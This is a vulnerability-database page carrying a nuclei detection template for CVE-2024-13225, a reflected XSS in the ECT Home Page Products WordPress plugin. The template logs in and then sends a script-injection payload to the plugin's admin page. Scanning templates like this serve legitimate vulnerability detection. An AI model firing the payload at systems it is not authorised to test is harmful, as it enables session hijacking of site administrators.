Lucene search
K

ECT Home Page Products - Reflected XSS

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Reflected XSS in ECT Home Page Products WordPress plugin up to version 1.9 via a malicious page.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13225
31 Jan 202506:16
circl
CVE
CVE-2024-13225
31 Jan 202506:00
cve
Cvelist
CVE-2024-13225 ECT Home Page Products <= 1.9 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51444
3 Oct 202520:07
euvd
NVD
CVE-2024-13225
31 Jan 202506:15
nvd
OSV
CVE-2024-13225
31 Jan 202506:15
osv
Patchstack
WordPress ECT Home Page Products plugin <= 1.9 - Reflected XSS vulnerability
31 Jan 202508:40
patchstack
Positive Technologies
PT-2025-2079
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13225
23 May 202507:10
redhatcve
Vulnrichment
CVE-2024-13225 ECT Home Page Products <= 1.9 - Reflected XSS
31 Jan 202506:00
vulnrichment
Rows per page
id: CVE-2024-13225

info:
  name: ECT Home Page Products - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    ECT Home Page Products WordPress plugin through 1.9 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires victim to visit a maliciously crafted page.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/8efd7d62-3f74-4108-970e-bd5ed24914ff/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13225
    cwe-id: CWE-79
    epss-score: 0.00577
    epss-percentile: 0.43366
    cpe: cpe:2.3:a:etemplates:ect_home_page_products:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etemplates
    product: ect_home_page_products
  tags: cve,cve2024,etemplates,ect-home-page-products,authenticated,xss,wordpress,wp,wp-plugin

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ect_homepage_prod_add&_id=testxss"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","ect-homepage-products")
        condition: and
# digest: 4a0a0047304502207ddfe0bcac5de629ece7ff43ad653c2fe3897832522253d40a9deaab42fcdf7e022100fe63ddbac9d48ed7457e2d0dca22183df08dcad5bd8255c2a69d40e676e8f7b0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 16:17Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00577
SSVC
13